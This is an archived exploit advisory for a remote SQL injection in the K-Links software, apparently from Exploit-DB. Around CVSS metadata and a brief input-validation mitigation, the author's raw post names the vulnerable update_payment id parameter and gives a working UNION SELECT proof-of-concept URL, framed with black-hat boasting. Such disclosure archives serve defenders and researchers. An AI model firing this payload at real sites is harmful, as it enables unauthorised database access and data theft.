REMOTE SQL iNJECTioN

vendor:

K-Links

by:

R3d-D3v!L

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: K-Links

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2011

A remote SQL injection vulnerability exists in K-Links software. An attacker can send a maliciously crafted request to the vulnerable server, which can be used to execute arbitrary SQL commands. The proof of concept is a maliciously crafted URL that contains an SQL injection payload. The payload is sent to the vulnerable server, which then executes the malicious SQL command.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
[~] Tybe: REMOTE SQL iNJECTioN  
[~] Vendor: http://turn-k.net 
[+] Software: K-Links
[+] author: ((R3d-D3v!L))  
[~]  
[+] TEAM: N0W... !AM W0RK!NG AL0NE
[~]  
[?] contact: X[at]hotmail.co.jp  
[-]  
[?] Date: ll.4Pr.2oll   
[?] T!ME: 05:15 am GMT   
[?] Home: .........
[^]    

[?] 
======================================================================================  
#suFFEr Fr0M REMOTE SQL iNJECTioN Vulnerabilities  
======================================================================================  
  
[*] Err0r C0N50L3: 
  
  
http://www.site.com/index.php?req=update_payment&id= EV!L INJECT!ON 
  
  
  
[*] prove of concept =  
  
  http://www.site.com/index.php?req=update_payment&id=-4410+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
 
  
  
Already Tested on Win Xp 
  
[~]-----------------------------{((BLACk-hAT))}------------------------------------------------ 
# ;
# ;
[~] Greetz tO: .................................................................... no one deserved ;
#  
[~]70 ALL ARAB!AN HACKER 3X3PT : .......................................LAM3RZ #  ;
#  
[~] spechial thanks :...................................... no one deserved  # ; 
#  
[?]spechial SupP0RT : ................MY M!ND # �  ;
#  
[?]---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #;  
#  
[~]spechial FR!ND:  ........................................no one deserved #;  
#  
[~] !'M 4R48!4N 3XPL0!73R. #;  
#  
[~](>D!R 4ll 0R D!E<) #;  
#  
[~]---------------------------------------------------------------------------------------------